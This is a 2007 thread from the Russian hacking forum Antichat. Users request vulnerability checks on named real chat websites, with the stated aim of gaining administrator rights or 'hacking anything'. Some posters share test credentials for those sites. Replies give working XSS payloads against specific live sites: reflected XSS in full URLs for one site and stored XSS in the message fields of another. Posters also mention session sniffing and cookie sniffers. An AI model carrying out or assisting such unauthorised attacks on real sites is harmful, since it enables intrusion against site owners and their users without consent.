ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Чаты
   
Закрытая тема
 
Опции темы Поиск в этой теме Опции просмотра

Проверка на уязвимости
  #1  
Старый 11.04.2007, 09:36
Аватар для Koller
Koller
Постоянный
Регистрация: 25.07.2005
Сообщений: 471
Провел на форуме:
3465924

Репутация: 931
По умолчанию Проверка на уязвимости

В последнее время часто начали появляться топы с просьбой проверить тот или иной чат на уязвимости.
Мною было принято решение создать отдельный топик для этих нужд.
Образец заявки:

Цитата:
1) Ссылка на чат
2) Название движка, если оно известно
3) Свои мысли (Что хотите именно сделать, свои попытки взлома)
4) Тестовый логин/пароль для входа
Все заявки оформленные не по образцу будут удаляться, как и флейм тоже...

Последний раз редактировалось Koller; 18.04.2007 в 22:15..
 

  #2  
Старый 15.04.2007, 05:22
Аватар для YARUS
YARUS
Новичок
Регистрация: 11.04.2007
Сообщений: 2
Провел на форуме:
5922

Репутация: 2
По умолчанию

1) http://chat.kursknet.ru/
2) движок незнаю....
3) оч нужно найти уязвимость.....
свох сил нехвотает пока....нужно найти любые дыры чтоб палучить прва администратора или хотяб админа KASH. для входа
4)
логин:удав пароль:147852
Заранее блогодарен.

Последний раз редактировалось YARUS; 16.04.2007 в 22:52..
 

  #3  
Старый 15.04.2007, 06:43
Аватар для Horsekiller
Horsekiller
Познающий
Регистрация: 22.11.2006
Сообщений: 68
Провел на форуме:
682079

Репутация: 137
Smile

Цитата:
Сообщение от YARUS  
http://chat.kursknet.ru/ оч нужно найти уязвимость.....свох сил нехвотает пока....нужно найти любые дыры чтоб палучить прва администратора или хотяб админа KASH. Заранее блогодарен.
РЕГИСТРАЦИЯ ЗАКРЫТА!
Тестовый логин нужен.

Думаю 4 пунктом в образце заявки нужно сделать тестовые логин/пароль, очень часто нужны.

Без логина выудил только пассивную XSS -
Код:
http://chat.kursknet.ru/cgi-bin/chat/sub.cgi?action=send_pwd&name="><script>alert("XSS")</script>

Апдейт:
еще XSS
Код:
http://chat.kursknet.ru/cgi-bin/chat/sub.cgi?action=userinfo&infoabout="><script>alert("XSS")</script>

Последний раз редактировалось Horsekiller; 15.04.2007 в 17:07..
 

  #4  
Старый 15.04.2007, 18:04
Аватар для YARUS
YARUS
Новичок
Регистрация: 11.04.2007
Сообщений: 2
Провел на форуме:
5922

Репутация: 2
По умолчанию

спасибо Horsekiller а активных xss нет?

Последний раз редактировалось YARUS; 15.04.2007 в 18:13..
 

  #5  
Старый 18.04.2007, 17:32
Аватар для [Pro.Stor]
[Pro.Stor]
Новичок
Регистрация: 17.04.2007
Сообщений: 9
Провел на форуме:
143020

Репутация: 10
Отправить сообщение для [Pro.Stor] с помощью ICQ
По умолчанию

1. wap.mc-chat.kmx.ru
2. название движка неизвестно.
3. Когда захожу в Прихожую, в адресной строке браузера вижу вот что http://wolk-club.ru/chats/enter.php?ci=1307&id=мой ид&pass=мой пароль. Думаю что-то с этим можно сделать.
4. Login: Test, Password: Test.

P.s. Заранее благодарю за помощь в поиске уязвимостей.
 

  #6  
Старый 19.04.2007, 03:50
Аватар для Horsekiller
Horsekiller
Познающий
Регистрация: 22.11.2006
Сообщений: 68
Провел на форуме:
682079

Репутация: 137
По умолчанию

wap.mc-chat.kmx.ru

Активная XSS - при написании письма другому пользователю, уязвимые поля :
тема и письмо,
вставляем в каждый по
Код:
"><script>alert("XSS")</script>
Получаем по алерту.
 

chat.kaktys.ru
  #7  
Старый 23.04.2007, 15:43
Аватар для KMC.noise
KMC.noise
Новичок
Регистрация: 23.04.2007
Сообщений: 1
Провел на форуме:
12938

Репутация: 0
По умолчанию chat.kaktys.ru

1) http://chat.kaktys.ru
2) Название движка неизвестно
3) сниффером выуживается сессия, но при заходе с этой сессии виден только фрейм с паблик сообщениями а неплохо бы было видно все включая настройки
4) login: Test
pass: test

PS : Заранее спасибо!!))
 

  #8  
Старый 25.04.2007, 21:27
Аватар для 6OSN
6OSN
Новичок
Регистрация: 24.04.2007
Сообщений: 3
Провел на форуме:
15590

Репутация: 0
По умолчанию

1. http://www.love-chat.ru/voc.php
2. Voodoo 0.90
3. Я как бы только учусь, может что и не так делал но засылал сниф а отдачи никакой потому что как мне объяснили что фильтр его не пускает.
4. login-федя)) pass-филиппова
 

  #9  
Старый 28.04.2007, 14:30
Аватар для Qwertison
Qwertison
Познающий
Регистрация: 01.04.2007
Сообщений: 43
Провел на форуме:
297955

Репутация: -5
По умолчанию

1. http://chat.by
2. ???
3. Хочу ломануть хоть что-нибудь, нифига в этом не шарю.
4. логин:test пасс:test1
 

  #10  
Старый 08.05.2007, 02:05
Аватар для bushkaaa
bushkaaa
Новичок
Регистрация: 07.05.2007
Сообщений: 3
Провел на форуме:
35605

Репутация: 0
По умолчанию

1.http://chatica.ru
2.php.spb
3.Бесят админы скин хеды))
4.логин:dede
pass:15781578
 
Закрытая тема



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
ПРОВЕРКА почти всех уязвимостей и багов! _GaLs_ Избранное 8 14.06.2010 12:00
Проверка серверов, и вебсайтов на уязвимости NeitR1N0 Разное - Покупка, продажа, обмен 12 18.03.2006 16:50
Уязвимости чатов L@nd@R Чаты 4 03.04.2005 05:12
Действующие уязвимости почтовых систем РФ Maxmen E-Mail 16 12.12.2004 16:48



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ